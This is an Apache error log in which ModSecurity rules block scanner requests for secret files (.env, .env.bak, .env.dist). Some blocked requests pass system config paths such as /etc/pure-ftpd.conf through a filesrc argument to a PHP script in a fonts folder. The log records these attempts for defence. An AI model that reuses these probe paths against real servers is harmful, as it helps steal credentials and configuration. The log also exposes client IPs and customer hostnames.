[Mon May 11 23:25:00.193448 2026] [security2:error] [pid 1630927:tid 1630949] [client 213.209.159.175:42680] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back/.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/back/.env.bak"] [unique_id "agJJLGiGYYhUwDaJINmgqwAAAVM"]
[Mon May 11 23:25:00.193669 2026] [security2:error] [pid 1630927:tid 1630949] [client 213.209.159.175:42680] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/back/.env.bak"] [unique_id "agJJLGiGYYhUwDaJINmgqwAAAVM"]
[Mon May 11 23:25:00.195580 2026] [security2:error] [pid 1630927:tid 1630949] [client 213.209.159.175:42680] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJLGiGYYhUwDaJINmgqwAAAVM"]
[Mon May 11 23:25:00.241686 2026] [security2:error] [pid 1590352:tid 1590394] [client 213.209.159.175:42692] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /proc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/proc/.env"] [unique_id "agJJLK1q0G_aXAqWauQNJAAAAII"]
[Mon May 11 23:25:00.242404 2026] [security2:error] [pid 1590352:tid 1590394] [client 213.209.159.175:42692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/proc/.env"] [unique_id "agJJLK1q0G_aXAqWauQNJAAAAII"]
[Mon May 11 23:25:00.244071 2026] [security2:error] [pid 1590352:tid 1590394] [client 213.209.159.175:42692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJLK1q0G_aXAqWauQNJAAAAII"]
[Mon May 11 23:25:00.292004 2026] [security2:error] [pid 1605480:tid 1605541] [client 213.209.159.175:42702] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /profile/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/profile/.env"] [unique_id "agJJLB2Cvzd_nyNfUm8TAQAAARM"]
[Mon May 11 23:25:00.292232 2026] [security2:error] [pid 1605480:tid 1605541] [client 213.209.159.175:42702] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/profile/.env"] [unique_id "agJJLB2Cvzd_nyNfUm8TAQAAARM"]
[Mon May 11 23:25:00.293787 2026] [security2:error] [pid 1605480:tid 1605541] [client 213.209.159.175:42702] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJLB2Cvzd_nyNfUm8TAQAAARM"]
[Mon May 11 23:25:00.346659 2026] [security2:error] [pid 1606352:tid 1606442] [client 213.209.159.175:42714] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /boot/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/boot/.env"] [unique_id "agJJLHo_DFxNSZVmaX3kJQAAANc"]
[Mon May 11 23:25:00.347069 2026] [security2:error] [pid 1606352:tid 1606442] [client 213.209.159.175:42714] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/boot/.env"] [unique_id "agJJLHo_DFxNSZVmaX3kJQAAANc"]
[Mon May 11 23:25:00.363957 2026] [security2:error] [pid 1606352:tid 1606442] [client 213.209.159.175:42714] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJLHo_DFxNSZVmaX3kJQAAANc"]
[Mon May 11 23:25:00.393669 2026] [security2:error] [pid 1588898:tid 1588916] [client 213.209.159.175:42716] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/cms/.env.dist"] [unique_id "agJJLKFW67LJTsgN3jQgNQAAABE"]
[Mon May 11 23:25:00.393894 2026] [security2:error] [pid 1588898:tid 1588916] [client 213.209.159.175:42716] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/cms/.env.dist"] [unique_id "agJJLKFW67LJTsgN3jQgNQAAABE"]
[Mon May 11 23:25:00.395366 2026] [security2:error] [pid 1588898:tid 1588916] [client 213.209.159.175:42716] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJLKFW67LJTsgN3jQgNQAAABE"]
[Mon May 11 23:25:02.687265 2026] [authz_core:error] [pid 1601130:tid 1601163] [client 216.73.216.110:50102] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/survey/error_log
[Mon May 11 23:25:33.812436 2026] [security2:error] [pid 1630927:tid 1630930] [client 43.133.54.83:44428] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/wc/"] [unique_id "agJJTWiGYYhUwDaJINmg0wAAAUA"]
[Mon May 11 23:25:56.131943 2026] [security2:error] [pid 1605480:tid 1605522] [client 43.134.40.189:60944] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/domotique/card-mod/"] [unique_id "agJJZB2Cvzd_nyNfUm8TXgAAAQA"]
[Mon May 11 23:25:57.333354 2026] [security2:error] [pid 1630927:tid 1630944] [client 43.128.67.187:47030] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.ventes-privees-auto.fr"] [uri "/"] [unique_id "agJJZWiGYYhUwDaJINmg9QAAAU4"]
[Mon May 11 23:26:09.281837 2026] [security2:error] [pid 1588898:tid 1588918] [client 43.135.142.7:46028] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/nos-services/cession-reprise-dentreprise-en-difficulte/"] [unique_id "agJJcaFW67LJTsgN3jQgkAAAABM"]
[Mon May 11 23:27:12.287622 2026] [ssl:error] [pid 1601130:tid 1601165] (EAI 2)Name or service not known: [client 199.45.154.130:56118] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:27:12.287678 2026] [ssl:error] [pid 1601130:tid 1601165] AH01941: stapling_renew_response: responder error
[Mon May 11 23:27:26.228984 2026] [ssl:error] [pid 1588898:tid 1588900] (EAI 2)Name or service not known: [client 199.45.154.130:35090] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:27:26.229029 2026] [ssl:error] [pid 1588898:tid 1588900] AH01941: stapling_renew_response: responder error
[Mon May 11 23:27:32.113660 2026] [ssl:error] [pid 1588898:tid 1588913] (EAI 2)Name or service not known: [client 199.45.154.130:40946] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:27:32.113845 2026] [ssl:error] [pid 1588898:tid 1588913] AH01941: stapling_renew_response: responder error
[Mon May 11 23:27:36.659180 2026] [security2:error] [pid 1606352:tid 1606433] [client 43.159.141.150:44738] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/13-octobre-2023-concert-punk-rock-a-la-baujue/"] [unique_id "agJJyHo_DFxNSZVmaX3lLAAAAM4"]
[Mon May 11 23:27:48.555476 2026] [ssl:error] [pid 1630927:tid 1630937] (EAI 2)Name or service not known: [client 199.45.154.130:43676] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Mon May 11 23:27:48.555526 2026] [ssl:error] [pid 1630927:tid 1630937] AH01941: stapling_renew_response: responder error
[Mon May 11 23:28:55.156215 2026] [security2:error] [pid 1630927:tid 1630938] [client 216.73.216.110:49220] ModSecurity: Warning. Matched phrase "etc/php.ini" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/php.ini found within ARGS:filesrc: /opt/cpanel/ea-php56/root/etc/php.ini.rpmsave"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJKF2iGYYhUwDaJINmh1AAAAUg"]
[Mon May 11 23:28:55.157744 2026] [security2:error] [pid 1630927:tid 1630938] [client 216.73.216.110:49220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJKF2iGYYhUwDaJINmh1AAAAUg"]
[Mon May 11 23:28:55.249550 2026] [security2:error] [pid 1630927:tid 1630938] [client 216.73.216.110:49220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJKF2iGYYhUwDaJINmh1AAAAUg"]
[Mon May 11 23:29:05.245391 2026] [security2:error] [pid 1605480:tid 1605527] [client 119.28.122.202:58274] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJKIR2Cvzd_nyNfUm8UzgAAAQU"]
[Mon May 11 23:29:08.329720 2026] [security2:error] [pid 1590352:tid 1590395] [client 129.226.94.18:60370] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJKJK1q0G_aXAqWauQOWAAAAIM"]
[Mon May 11 23:29:44.447373 2026] [security2:error] [pid 1605480:tid 1605530] [client 43.155.157.239:49338] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJKSB2Cvzd_nyNfUm8U6AAAAQg"]
[Mon May 11 23:29:49.302788 2026] [:error] [pid 1601130:tid 1601157] [client 40.77.167.151:64670] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 23:30:14.372182 2026] [security2:error] [pid 1605480:tid 1605542] [client 216.73.216.110:47525] ModSecurity: Warning. Matched phrase "etc/pure-ftpd.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/pure-ftpd.conf found within ARGS:filesrc: /etc/pure-ftpd.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJKZh2Cvzd_nyNfUm8VAQAAARQ"]
[Mon May 11 23:30:14.373208 2026] [security2:error] [pid 1605480:tid 1605542] [client 216.73.216.110:47525] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJKZh2Cvzd_nyNfUm8VAQAAARQ"]
[Mon May 11 23:30:14.467633 2026] [security2:error] [pid 1605480:tid 1605542] [client 216.73.216.110:47525] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJKZh2Cvzd_nyNfUm8VAQAAARQ"]
[Mon May 11 23:30:54.728227 2026] [security2:error] [pid 1588898:tid 1588910] [client 43.160.240.216:40324] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/index.php"] [unique_id "agJKjqFW67LJTsgN3jQiCwAAAAs"]
[Mon May 11 23:31:35.835084 2026] [security2:error] [pid 1601130:tid 1601163] [client 43.135.182.43:50906] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/downloads/APOE-BILAN-2019.pdf"] [unique_id "agJKt3EgAO_835W6c1msEwAAAE0"]
[Mon May 11 23:31:39.851624 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:31:40.738729 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:06.192063 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:06.742557 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:08.589992 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:09.245493 2026] [autoindex:error] [pid 1601130:tid 1601173] [client 172.190.142.176:59843] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 23:32:09.971366 2026] [autoindex:error] [pid 1590352:tid 1590410] [client 172.190.142.176:44632] AH01276: Cannot serve directory /home/tcttelec/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
